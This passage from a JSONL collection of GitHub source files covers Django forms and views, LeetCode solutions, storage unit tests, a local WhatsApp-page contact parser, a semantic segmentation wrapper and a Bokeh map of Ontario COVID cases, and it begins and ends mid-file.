if(key[0].isdecimal() or key[1].isdecimal()):\r\n continue\r\n except:\r\n pass\r\n poss = nltk.pos_tag(key)\r\n if(poss[0][1] in [\"NNP\",\"NN\",\"VB\",\"NNS\",\"NNPS\",\"VBN\"]):\r\n f.write(\"%s,%s\\n\"%(key,fre[key]))\r\n\r\nprint(\"Word Written\")\r\n\r\nwith open(save_path1, 'w') as f:\r\n for key in ufre.keys():\r\n try:\r\n if(key[0].isdecimal() or key[1].isdecimal()):\r\n continue\r\n except:\r\n pass\r\n poss = nltk.pos_tag(key)\r\n if(poss[0][1] in [\"NNP\",\"NN\",\"VB\",\"NNS\",\"NNPS\",\"VBN\"]):\r\n f.write(\"%s,%s\\n\"%(key,ufre[key]))\r\n\r\nprint(\"Written on CSV\")","repo_name":"iSriBalaji/Twitter-and-Facebook-post-clustering","sub_path":"Getting Bag of Words.py","file_name":"Getting Bag of Words.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71744899474","text":"class Solution:\n def minMoves2(self, nums: List[int]) -> int:\n # each move: +1 or -1\n # first thing: find the avg between all numbers, and +1 or -1 from other elements to match it\n # ex: [1, 10, 2, 9] : avg = (1+10+2+9)/4 = 22 // 4 = 5\n # another approach: 1, 2, 9, 10: get median: 5, 4+3+4+5 = 16\n # [1,0,0,8,6] = 0,0,1,6,8 = median = 4\n # 4, 5, 3, 4 = 16\n # ex: [1, 2, 3] : avg = (1+2+3)/3 = 2\n # 1, 0, 1 = 2\n \n # find the median in the array*** \n avg = 0\n nSum = 0\n # sort array\n nums = sorted(nums)\n medianEl = nums[len(nums)//2]\n \n # inc/dec\n totalMoves = 0\n for i in range(len(nums)):\n indMove = (nums[i] - medianEl)\n if indMove < 0:\n indMove*=-1\n totalMoves += indMove\n return totalMoves\n","repo_name":"iamaryaak/LeetCode-Python","sub_path":"462.py","file_name":"462.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1937090040","text":"__author__ = 'austin_45B_Kerkhoff'\nfrom django.forms.util import ErrorList\nfrom django.forms import ModelForm, DateTimeInput, CharField, TextInput, model_to_dict\nfrom SampleISP.models import VENDOR, PROVINCE, Router, Switch, IPaddress, \\\n RAS, Customer, RouterPort, SwitchPort\nfrom django.forms.models import BaseModelFormSet, modelformset_factory, inlineformset_factory\nfrom django.conf import settings\nfrom SampleISP.widgets import MyTextInputWidget\n\nclass RouterForm(ModelForm):\n router_name = CharField(\n widget=TextInput(attrs={'class': 'sortable', 'readonly':'readonly'}),\n initial='Initial Value',\n )\n class Meta:\n model = Router\n fields = ('router_name','router_model','last_maintained_date',)\n # exclude = ('id',)\n widgets = {\n 'last_maintained_date': DateTimeInput(attrs={'class':'sortable',}),\n # 'router_name': TextInput(attrs={'class': 'sortable', 'value':'Router_Name', 'readonly':'readonly'}),\n }\n\nclass FormSetWithExtra(BaseModelFormSet):\n def add_fields(self, form, index):\n super(FormSetWithExtra,self).add_fields(form, index)\n form.fields['extra_field'] = CharField(required=False)\n\nRouterPortFormSet = modelformset_factory(RouterPort,\n extra=1,\n can_order=False, can_delete=False)\n\nRouterPortFormSetWithExtra = modelformset_factory(RouterPort,\n formset=FormSetWithExtra,\n extra=1,\n can_order=False, can_delete=False)\n\nclass SwitchForm(ModelForm):\n class Meta:\n model = Switch\n\nclass RouterPortForm(ModelForm):\n class Meta:\n model = RouterPort\n # widgets = {\n # 'port_name': MyTextInputWidget(\n # attrs={'class': 'sortable', 'readonly':'readonly'}\n # ),\n # }\n class Media:\n css = {\n 'all': (\n settings.STATIC_URL + 'css/themes/camtran/jquery-ui-1.8.6.custom.css',\n ),\n }\n js = (\n settings.STATIC_URL + 'js/jquery-1.9.0.js',\n settings.STATIC_URL + 'js/jquery-ui-1.10.0.custom.js',\n )\n\n def is_valid(self):\n if self:\n if self.initial['port_name'] != self.data['port_name']:\n port_name_changed = True\n else:\n port_name_changed = False\n if str(self.initial['router']) != self.data['router']:\n router_changed = True\n else:\n router_changed = False\n if str(self.initial['switch']) != self.data['switch']:\n switch_changed = True\n else:\n switch_changed = False\n is_valid = super(RouterPortForm, self).is_valid()\n return is_valid\n else:\n return False\n\nclass SwitchPortForm(ModelForm):\n class Meta:\n model = SwitchPort\n\nclass CustomerForm(ModelForm):\n class Meta:\n model = Customer\n\nclass RASForm(ModelForm):\n ras_name = CharField(\n widget=TextInput(attrs={'class': 'sortable', 'readonly':'readonly'}),\n initial='Initial Value',\n )\n class Meta:\n model = RAS\n fields = ('ras_name','ras_model','last_maintained_date',)\n\nclass IPaddressForm(ModelForm):\n class Meta:\n model = IPaddress\n\nIPaddressInlineFormSet = inlineformset_factory(RAS, IPaddress, extra=1)","repo_name":"austinjung/InterviewApp","sub_path":"SampleISP/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13927713927","text":"import os\nimport unittest.mock\nfrom pathlib import Path\n\nimport pytest\n\nfrom determined.common import check, storage\nfrom determined.common.storage import shared\nfrom tests.storage import util\n\n\n@pytest.fixture()\ndef manager(tmp_path: Path) -> storage.SharedFSStorageManager:\n return storage.SharedFSStorageManager(str(tmp_path))\n\n\ndef test_full_storage_path() -> None:\n with pytest.raises(check.CheckFailedError, match=\"`host_path` must be an absolute path\"):\n shared._full_storage_path(\"host_path\")\n\n path = shared._full_storage_path(\"/host_path\")\n assert path == \"/host_path\"\n\n path = shared._full_storage_path(\"/host_path\", container_path=\"cpath\")\n assert path == \"cpath\"\n\n path = shared._full_storage_path(\"/host_path\", \"storage_path\")\n assert path == \"/host_path/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", \"storage_path\", container_path=\"cpath\")\n assert path == \"cpath/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", storage_path=\"/host_path/storage_path\")\n assert path == \"/host_path/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", \"/host_path/storage_path\", \"cpath\")\n assert path == \"cpath/storage_path\"\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"/storage_path\")\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"/host_path/../test\")\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"../test\")\n\n\ndef test_checkpoint_lifecycle(manager: storage.SharedFSStorageManager) -> None:\n def post_delete_cb(storage_id: str) -> None:\n assert storage_id not in os.listdir(manager._base_path)\n\n util.run_storage_lifecycle_test(manager, post_delete_cb)\n\n\ndef test_validate(manager: storage.SharedFSStorageManager) -> None:\n assert len(os.listdir(manager._base_path)) == 0\n storage.validate_manager(manager)\n assert len(os.listdir(manager._base_path)) == 0\n\n\ndef test_validate_read_only_dir(manager: storage.SharedFSStorageManager) -> None:\n def permission_error(_1: str, _2: str) -> None:\n raise PermissionError(\"Permission denied\")\n\n with unittest.mock.patch(\"builtins.open\", permission_error):\n assert len(os.listdir(manager._base_path)) == 0\n with pytest.raises(PermissionError, match=\"Permission denied\"):\n storage.validate_manager(manager)\n assert len(os.listdir(manager._base_path)) == 1\n","repo_name":"2021-paper-fun/determined","sub_path":"harness/tests/storage/test_shared_fs.py","file_name":"test_shared_fs.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"722288727","text":"##############################\n# created by Bilal Haroon\n# \n# purpose: get all whatsapp contacts\n# \n# email: bharoon@acceducate.com\n##############################\n\n\n# html parser\nfrom bs4 import BeautifulSoup\n\ngroup_names = []\nnumbers = []\n\nf = open('test.html', 'r', encoding='utf8')\n\n# parse the file\nsource = BeautifulSoup(f.read(), \"html5lib\")\n\n# get the names\ndef get_names():\n \n names = source.find_all(\"div\", {\"class\": \"_3Bxar\"})\n\n # itirate through all the names\n for name in names:\n \n # get all the children\n children = name.findChildren()\n \n # iterate through all the children\n for child in children:\n # if child is a name\n if child.get('class') == ['_1qP8m']:\n \n group_names.append(child.text)\n # print(child.text)\n return group_names\n\n\n# get the numbers\ndef get_numbers():\n phone_numbers = source.find_all(\"div\", {\"class\":\"_25Ooe\"})\n\n for number in phone_numbers:\n \n # get all the chidren\n child = number.findChild()\n \n if child is not None:\n # if child is a phone number i.e +1 (123) 456-789\n if child.text[:2] == '+1':\n numbers.append(child.text)\n # print(child.text)\n return numbers\n\n\ndef main():\n for name in get_names():\n print(name)\n \n print(\"=====================================================\")\n \n for number in get_numbers():\n print(number)\n \n\nif __name__ == '__main__':\n main()","repo_name":"Bilalharoon/whatsapp_scrapper","sub_path":"get_info.py","file_name":"get_info.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"24114897339","text":"from . import ClothesGUI\nfrom toontown.toon import ToonDNA\n\nclass MakeClothesGUI(ClothesGUI.ClothesGUI):\n notify = directNotify.newCategory('MakeClothesGUI')\n\n def __init__(self, doneEvent):\n ClothesGUI.ClothesGUI.__init__(self, ClothesGUI.CLOTHES_MAKETOON, doneEvent)\n\n def setupScrollInterface(self):\n self.dna = self.toon.getStyle()\n gender = self.dna.getGender()\n if gender != self.gender:\n self.tops = ToonDNA.getRandomizedTops(gender, tailorId=ToonDNA.MAKE_A_TOON)\n self.bottoms = ToonDNA.getRandomizedBottoms(gender, tailorId=ToonDNA.MAKE_A_TOON)\n self.gender = gender\n self.topChoice = 0\n self.bottomChoice = 0\n self.setupButtons()\n\n def setupButtons(self):\n ClothesGUI.ClothesGUI.setupButtons(self)\n if len(self.dna.torso) == 1:\n if self.gender == 'm':\n torsoStyle = 's'\n elif self.girlInShorts == 1:\n torsoStyle = 's'\n else:\n torsoStyle = 'd'\n self.toon.swapToonTorso(self.dna.torso[0] + torsoStyle)\n self.toon.loop('neutral', 0)\n self.toon.swapToonColor(self.dna)\n self.swapTop(0)\n self.swapBottom(0)\n return None\n","repo_name":"open-toontown/open-toontown","sub_path":"toontown/makeatoon/MakeClothesGUI.py","file_name":"MakeClothesGUI.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"84"} +{"seq_id":"12113212172","text":"import os\nimport rospkg\nimport torch\nimport types\nimport numpy as np\nimport torch.nn as nn\nfrom PIL import Image\nfrom scipy.io import loadmat\nfrom torchvision import transforms\n\nfrom mit_semseg.config import cfg\nfrom mit_semseg.utils import colorEncode\nfrom mit_semseg.lib.utils import as_numpy\nfrom mit_semseg.lib.nn import async_copy_to\nfrom mit_semseg.models import ModelBuilder, SegmentationModule\n\n\nclass SemanticSegmentationNetwork():\n\tdef __init__(self, model=\"ade20k-resnet50dilated-ppm_deepsup.yaml\", args=None, verbose=False):\n\t\t'''\n\t\tInitializes and runs the CSAIL Semantic Segmentation network for use in the\n\t\tterrain estimation mapping algoritm. Loads network weights, prepares input\n\t\timages for network, runs the segmentation network, and outputs visualizations\n\t\tto a file.\n\n\t\tParameters\n\t\t------------\n\t\targs : obj, provides necessary arguements for network initialization\n\n\t\tReturns\n\t\t-----------\n\t\t'''\n\n\t\tself.verbose = verbose\n\t\trospack = rospkg.RosPack()\n\t\tpath = rospack.get_path('mit_semseg_wrapper')\n\t\tif args is None:\n\t\t\targs = types.SimpleNamespace()\n\t\t\targs.gpu = 0\n\t\t\targs.cfg = model\n\t\t\targs.opts = []\n\t\targs.cfg = os.path.join(path, os.path.join('src/mit_semseg/config/', args.cfg))\n\t\tself.args = args\n\n\t\tcfg.merge_from_file(args.cfg)\n\t\tcfg.merge_from_list(args.opts)\n\t\tcfg.MODEL.arch_encoder = cfg.MODEL.arch_encoder.lower()\n\t\tcfg.MODEL.arch_decoder = cfg.MODEL.arch_decoder.lower()\n\n\t\t# absolute paths of model weights\n\t\tcfg.MODEL.weights_encoder = os.path.join(\n\t\t\tpath, cfg.DIR, 'encoder_' + cfg.TEST.checkpoint)\n\t\tcfg.MODEL.weights_decoder = os.path.join(\n\t\t\tpath, cfg.DIR, 'decoder_' + cfg.TEST.checkpoint)\n\n\t\tif not os.path.exists(cfg.MODEL.weights_encoder) and \\\n\t\t\tos.path.exists(cfg.MODEL.weights_decoder):\n\t\t\tprint(\"Could not find saved model weights!\")\n\t\t\treturn\n\n\t\tself.imgSizes = cfg.DATASET.imgSizes\n\t\tself.imgMaxSize = cfg.DATASET.imgMaxSize\n\t\tself.padding_constant = cfg.DATASET.padding_constant\n\t\tself.normalize = transforms.Normalize(\n\t\t\tmean=[0.485, 0.456, 0.406],\n\t\t\tstd=[0.229, 0.224, 0.225])\n\n\t\ttorch.cuda.set_device(args.gpu)\n\n\t\t# Network Builders\n\t\tif self.verbose:\n\t\t\tprint(\"Building encoder and decoder networks\")\n\t\tnet_encoder = ModelBuilder.build_encoder(\n\t\t\tarch=cfg.MODEL.arch_encoder,\n\t\t\tfc_dim=cfg.MODEL.fc_dim,\n\t\t\tweights=cfg.MODEL.weights_encoder)\n\t\tnet_decoder = ModelBuilder.build_decoder(\n\t\t\tarch=cfg.MODEL.arch_decoder,\n\t\t\tfc_dim=cfg.MODEL.fc_dim,\n\t\t\tnum_class=cfg.DATASET.num_class,\n\t\t\tweights=cfg.MODEL.weights_decoder,\n\t\t\tuse_softmax=True)\n\n\t\tcrit = nn.NLLLoss(ignore_index=-1)\n\n\t\tif self.verbose:\n\t\t\tprint(\"Building final semantic segmentation network\")\n\t\tself.segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\t\tself.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\t\tself.segmentation_module.to(self.device)\n\n\tdef prepareImage(self, image):\n\t\t'''\n\t\tResizes an image as necessary in order to be able to act as input into\n\t\tthe semantic segmentation network.\n\n\t\tParameters\n\t\t------------\n\t\timage : PIL.Image, image to use as input\n\n\t\tReturns\n\t\t-----------\n\t\timage : PIL.Image, resized and padded image\n\t\t'''\n\t\tif isinstance(image, Image.Image):\n\t\t\tori_width, ori_height = image.size\n\t\telif isinstance(image, np.ndarray):\n\t\t\timage = Image.fromarray(image.astype(np.uint8))\n\t\t\tori_width, ori_height = image.size\n\n\t\timg_resized_list = []\n\t\tfor this_short_size in self.imgSizes:\n\t\t\t# calculate target height and width\n\t\t\tscale = min(this_short_size / float(min(ori_height, ori_width)),\n\t\t\t\t\t\tself.imgMaxSize / float(max(ori_height, ori_width)))\n\t\t\ttarget_height, target_width = int(ori_height * scale), int(ori_width * scale)\n\n\t\t\t# to avoid rounding in network\n\t\t\ttarget_width = self.round2nearest_multiple(target_width, self.padding_constant)\n\t\t\ttarget_height = self.round2nearest_multiple(target_height, self.padding_constant)\n\n\t\t\t# resize images\n\t\t\timg_resized = self.imresize(image, (target_width, target_height), interp='bilinear')\n\n\t\t\t# image transform, to torch float tensor 3xHxW\n\t\t\timg_resized = self.img_transform(img_resized)\n\t\t\timg_resized = torch.unsqueeze(img_resized, 0)\n\t\t\timg_resized_list.append(img_resized)\n\n\t\toutput = dict()\n\t\toutput['img_ori'] = np.array(image)\n\t\toutput['img_data'] = [x.contiguous() for x in img_resized_list]\n\t\treturn output\n\n\tdef imresize(self, im, size, interp='bilinear'):\n\t\tif interp == 'nearest':\n\t\t\tresample = Image.NEAREST\n\t\telif interp == 'bilinear':\n\t\t\tresample = Image.BILINEAR\n\t\telif interp == 'bicubic':\n\t\t\tresample = Image.BICUBIC\n\t\telse:\n\t\t\traise Exception('resample method undefined!')\n\n\t\treturn im.resize(size, resample)\n\n\tdef img_transform(self, img):\n\t\t# 0-255 to 0-1\n\t\timg = np.float32(np.array(img)) / 255.\n\t\timg = img.transpose((2, 0, 1))\n\t\timg = self.normalize(torch.from_numpy(img.copy()))\n\t\treturn img\n\n\tdef round2nearest_multiple(self, x, p):\n\t\treturn ((x - 1) // p + 1) * p\n\n\tdef runSegmentation(self, image:Image, return_numpy=True, one_hot=False):\n\t\t'''\n\t\tPasses an image through the network and returns the pixelwise terrain class\n\t\tcategorical probabilities.\n\n\t\tParameters\n\t\t------------\n\t\timage : PIL.Image, image to input to network\n\n\t\tReturns\n\t\t-----------\n\t\tarray : (w,h,k) shape array, pixelwise terrain class probability scores\n\t\t'''\n\n\t\tfeed_dict = {}\n\t\tself.segmentation_module.eval()\n\t\timage = self.prepareImage(image)\n\n\t\tsegSize = (image['img_ori'].shape[0],\n\t\t\t\t image['img_ori'].shape[1])\n\t\timg_resized_list = image['img_data']\n\n\t\twith torch.no_grad():\n\t\t\tscores = torch.zeros(1, cfg.DATASET.num_class, segSize[0], segSize[1])\n\t\t\tscores = async_copy_to(scores, self.args.gpu)\n\n\t\t\tfor img in img_resized_list:\n\t\t\t\tfeed_dict = image.copy()\n\t\t\t\tfeed_dict['img_data'] = img\n\t\t\t\tdel feed_dict['img_ori']\n\t\t\t\tfeed_dict = async_copy_to(feed_dict, self.args.gpu)\n\n\t\t\t\tpred_tmp = self.segmentation_module(feed_dict, segSize=segSize)\n\t\t\t\tscores = scores + pred_tmp / len(cfg.DATASET.imgSizes)\n\t\t\t\n\t\t\tscores = scores.squeeze(0)\n\t\t\tif one_hot and return_numpy:\n\t\t\t\tscores = torch.argmax(scores, 0, keepdim=True)\n\t\t\tif return_numpy:\n\t\t\t\treturn as_numpy(scores.cpu())\n\t\t\telse:\n\t\t\t\treturn scores\n\n\tdef visualize_result(self, img, scores, savepath):\n\t\t'''\n\t\tSaves the segmented image where each pixel is colored based on the\n\t\tmost likely terrain class. All red colored classes changed to cyan.\n\n\t\tParameters\n\t\t------------\n\t\timg : PIL.Image, reference image\n\t\tscores : (w,h,k) shape array, pixelwise terrain class probability scores\n\t\tsavepath : str, location to save segmented image\n\t\t'''\n\n\t\tcolors = loadmat('network/color150.mat')['colors']\n\n\t\t# Change all red-colored classes to cyan\n\t\tcolors[15, :] = [10, 186, 181]\n\t\tcolors[18, :] = [10, 186, 181]\n\t\tcolors[22, :] = [10, 186, 181]\n\t\tcolors[24, :] = [10, 186, 181]\n\t\tcolors[28, :] = [10, 186, 181]\n\t\tcolors[34, :] = [10, 186, 181]\n\t\tcolors[42, :] = [10, 186, 181]\n\t\tcolors[49, :] = [10, 186, 181]\n\t\tcolors[52, :] = [10, 186, 181]\n\t\tcolors[66, :] = [10, 186, 181]\n\t\tcolors[83, :] = [10, 186, 181]\n\t\tcolors[108, :] = [10, 186, 181]\n\n\t\t# _, pred = torch.max(scores, dim=1)\n\t\tpred = np.argmax(scores, axis=0)\n\n\t\t# print predictions in descending order\n\t\tpred = np.int32(pred)\n\t\tpixs = pred.size\n\t\tuniques, counts = np.unique(pred, return_counts=True)\n\n\t\t# colorize prediction\n\t\tpred_color = colorEncode(pred, colors).astype(np.uint8)\n\n\t\t# aggregate images and save\n\t\tim_vis = np.concatenate((img, pred_color), axis=1)\n\n\t\t# Image.fromarray(im_vis).save(savepath)\n\t\tImage.fromarray(im_vis).show()\n\t\tImage.fromarray(pred_color).save(savepath)\n\n\nif __name__ == '__main__':\n\timage = Image.open('00001.jpg').convert('RGB')\n\n\tnetwork = SemanticSegmentationNetwork()\n\tscores = network.runSegmentation(image)\n","repo_name":"roahmlab/sel_map","sub_path":"sel_map_segmentation/mit_semseg_wrapper/src/mit_semseg_wrapper/semsegNetwork.py","file_name":"semsegNetwork.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"84"} +{"seq_id":"25969383184","text":"#User function Template for python3\nfrom collections import OrderedDict\n\nclass Solution:\n def FirstNonRepeating(self, A):\n count_dict = OrderedDict()\n result = []\n \n for ch in A:\n count_dict[ch] = count_dict.get(ch, 0) + 1\n \n non_repeating_ch = None\n for key, value in count_dict.items():\n if value == 1:\n non_repeating_ch = key\n break\n \n if non_repeating_ch:\n result.append(non_repeating_ch)\n else:\n result.append('#')\n \n return ''.join(result)\n\n\n#{ \n # Driver Code Starts\n\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n\tT=int(input())\n\tfor i in range(T):\n\t\tA = input()\n\t\tob = Solution()\n\t\tans = ob.FirstNonRepeating(A)\n\t\tprint(ans)\n\n# } Driver Code Ends","repo_name":"Umang-Lodaya/LeetCode-Questions","sub_path":"First non-repeating character in a stream - GFG/first-nonrepeating-character-in-a-stream.py","file_name":"first-nonrepeating-character-in-a-stream.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41471366294","text":"#6-6. Polling: Use the code in favorite_languages.py (page 104).\n#108 Chapter 6\n#•\t Make a list of people who should take the favorite languages poll. Include\n#some names that are already in the dictionary and some that are not.\n#•\t Loop through the list of people who should take the poll. If they have\n#already taken the poll, print a message thanking them for responding.\n#If they have not yet taken the poll, print a message inviting them to take\n#the poll\n\nfavorite_languages = {\n\t\"jen\": \"python\",\n\t\"sarah\": \"c\",\n\t\"edward\": \"ruby\",\n\t\"phil\": \"python\",\n}\n\nshould_take_poll = [\"gabriel\", \"jen\", \"sarah\", \"matheus\", \"edward\", \"ale\", \"luan\"]\n\nfor name in should_take_poll:\n\tif name in favorite_languages:\n\t\tprint(\"{}, thanks for responding.\" .format(name.title()))\n\telse:\n\t\tprint(\"{}, you'd be welcome to take the poll.\" .format(name.title()))","repo_name":"gabrieldomene/Code-Everyday","sub_path":"ExLivro/Dict6-6.py","file_name":"Dict6-6.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"73336559634","text":"import os\nimport re\nfrom pip.download import PipSession\nfrom pip.req import parse_requirements\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nwith open('blackfynn/__init__.py', 'r') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\ninstall_reqs = parse_requirements('requirements.txt', session=PipSession())\nreqs = [str(ir.req) for ir in install_reqs]\n\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = \"blackfynn\",\n version = version,\n author = \"Blackfynn, Inc.\",\n author_email = \"mark@blackfynn.com\",\n description = \"Python client for the Blackfynn Platform\",\n long_description = long_description,\n packages=find_packages(),\n package_dir={'blackfynn': 'blackfynn'},\n setup_requires=['cython'],\n install_requires = reqs,\n python_requires='<3',\n entry_points = {\n 'console_scripts': [\n 'bf=blackfynn.cli.bf:blackfynn_cli',\n ]\n },\n license = \"\",\n keywords = \"blackfynn client rest api\",\n url = \"http://app.blackfynn.io\",\n download_url = \"\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n ],\n)\n","repo_name":"intrepidlemon/blackfynn-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4409425918","text":"import csv\r\nimport geopandas as gpd\r\nimport pandas as pd\r\nfrom bokeh.io import show, curdoc\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar\r\nfrom bokeh.models import Slider, HoverTool\r\nimport json\r\nfrom bokeh.palettes import brewer\r\nfrom bokeh.models import CheckboxButtonGroup, RadioButtonGroup, CustomJS\r\nfrom bokeh.layouts import widgetbox, row, column\r\n\r\n# Names of files needed\r\ncovid_map = \"ontario_map/Ministry_of_Health_Public_Health_Unit_Boundary.shp\"\r\ncovid_data = \"cases_by_status_and_phu.csv\"\r\n\r\n# Open .csv file using dictionaries\r\ninput_data = csv.DictReader(open(covid_data))\r\n\r\n# Open files using GeoPandas and Pandas\r\ndata_map_df = gpd.read_file(covid_map)[['OGF_ID', 'PHU_NAME_E', 'geometry']]\r\ncovid_data_df = pd.DataFrame.from_dict(input_data)\r\n\r\n# Fetch data for the latest date and merge it to the map\r\nlatest_covid_data_df = covid_data_df[covid_data_df['FILE_DATE'] == \"20200410\"]\r\nmerged = data_map_df.merge(latest_covid_data_df, left_on=\"PHU_NAME_E\", right_on=\"PHU_NAME\")\r\n\r\n#Read data to json.\r\nmerged_json = json.loads(merged.to_json())\r\n\r\n#Convert to String like object. \r\njson_data = json.dumps(merged_json)\r\n\r\n#Define function that returns json_data for year selected by user. \r\ndef json_data_mapping(date):\r\n dt = date\r\n print(str(dt))\r\n print(covid_data_df['FILE_DATE'] == str(dt))\r\n c19df_dt = covid_data_df[covid_data_df['FILE_DATE'] == str(dt)]\r\n merged = data_map_df.merge(latest_covid_data_df, left_on=\"PHU_NAME_E\", right_on=\"PHU_NAME\")\r\n #merged.fillna('No data', inplace = True)\r\n merged_json = json.loads(merged.to_json())\r\n json_data = json.dumps(merged_json)\r\n return json_data\r\n\r\n#Define a sequential multi-hue color palette.\r\npalette = brewer['RdYlGn'][8]\r\n\r\n#Add hover tool\r\nhover = HoverTool(tooltips = [ ('Public Health Unit','@PHU_NAME'),('Active Cases No: ', '@ACTIVE_CASES')])\r\n\r\n# GeoData source\r\ngeosource = GeoJSONDataSource(geojson = json_data)\r\n\r\n#Instantiate LinearColorMapper that linearly maps numbers in a range, into a sequence of colors. Input nan_color.\r\ncolor_mapper = LinearColorMapper(palette = palette, low = 0, high = 40, nan_color = '#d9d9d9')\r\n\r\n# Function that will generate fill_color dictionary\r\ncolour_filling = {'field' :'ACTIVE_CASES', 'transform' : color_mapper}\r\n\r\n#Define custom tick labels for color bar.\r\ntick_labels = {'0': '0%', '5': '5%', '10':'10%', '15':'15%', '20':'20%', '25':'25%', '30':'30%','35':'35%', '40': '>40%'}\r\n\r\n# Function that will re-draw the map with data category that was selected by the user\r\ndef map_redraw(choice):\r\n fill_dict = {}\r\n if choice == 0:\r\n # Draw the map with Active Cases\r\n fill_dict.update({'field' :'ACTIVE_CASES', 'transform' : color_mapper})\r\n elif choice == 1:\r\n # Draw the map with Resolved Cases\r\n fill_dict.update({'field' :'RESOLVED_CASES', 'transform' : color_mapper})\r\n else:\r\n # Draw the map with Deaths\r\n fill_dict.update({'field' :'DEATHS', 'transform' : color_mapper})\r\n return fill_dict\r\n\r\n#Create color bar. \r\ncolor_bar = ColorBar(color_mapper=color_mapper, label_standoff=8,width = 500, height = 20,\r\n border_line_color=None,location = (0,0), orientation = 'horizontal', major_label_overrides = tick_labels)\r\n\r\n# Draw map\r\ndata_map = figure(title=\"Active COVID cases by Public Health Unit in Ontario\", plot_height = 600 , plot_width = 950, toolbar_location = None, tools=[hover], output_backend=\"webgl\")\r\ndata_map.patches(source=geosource, line_color = 'black', fill_color = colour_filling, line_width = 0.25, fill_alpha = 1)\r\n\r\n# Update the data that is displayed\r\ndef json_data_update(attr, old, new):\r\n geosource.geojson = json_data_mapping(data_slider.value)\r\n data_map.patches(source=geosource, line_color = 'black', fill_color = colour_filling, line_width = 0.25, fill_alpha = 1)\r\n\r\ndef update(attr, old, new):\r\n # Adjust map by using radio buttons\r\n colour_fillings = map_redraw(new)\r\n categories = [\"Active COVID cases\", \"Resolved COVID cases\", \"Deaths due to COVID\"]\r\n data_map.patches(source=geosource, line_color = 'black', fill_color = colour_fillings, line_width = 0.25, fill_alpha = 1)\r\n data_map.title.text = categories[new] + ' by Public Health Unit in Ontario'\r\n\r\n#Specify figure layout.\r\ndata_map.add_layout(color_bar, 'below')\r\nbutton_group = RadioButtonGroup(labels=[\"Active Cases\", \"Resolved Cases\", \"Deaths\"], active=0)\r\nbutton_group.on_change('active', lambda attr, old, new: update(attr, old, new))\r\n# Slider tool for selecting dates\r\ndata_slider = Slider(title = 'Date (YYYYMMDD)',start = 20200410, end = 20201224, step = 1, value = 20200410)\r\ndata_slider.on_change('value', json_data_update)\r\n# Output final map\r\nproject_layout = column(data_map,widgetbox(button_group, data_slider))\r\ncurdoc().add_root(project_layout)\r\n","repo_name":"DragiPlakalovic/COVID19_DataVis_Ontario","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"18017528058","text":"from collections import UserList\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView, Request, Response, status\nfrom core.pagination import CustomPageNumberPagination\nfrom users.models import User, Userlist\nfrom .permissions import HasPermission, HasToken\nfrom animes.models import Anime\nfrom rest_framework.authentication import TokenAuthentication\nfrom userslist.serializers import UserListSerializer\n\n\ndef formatted_response(data):\n\n serializer_data = {\n **data,\n \"anime\": {\n \"id\": Anime.objects.get(pk=data[\"anime\"]).id,\n \"title\": Anime.objects.get(pk=data[\"anime\"]).title,\n \"image\": Anime.objects.get(pk=data[\"anime\"]).image,\n \"average_rate\": Anime.objects.get(pk=data[\"anime\"]).average_rate,\n },\n \"user\": {\n \"id\": User.objects.get(pk=data[\"user\"]).id,\n \"name\": User.objects.get(pk=data[\"user\"]).first_name,\n },\n }\n\n return serializer_data\n\n\nclass UserlistView(APIView, CustomPageNumberPagination):\n\n authentication_classes = [TokenAuthentication]\n permission_classes = [HasToken, HasPermission]\n\n def get(self, request):\n\n userlist = 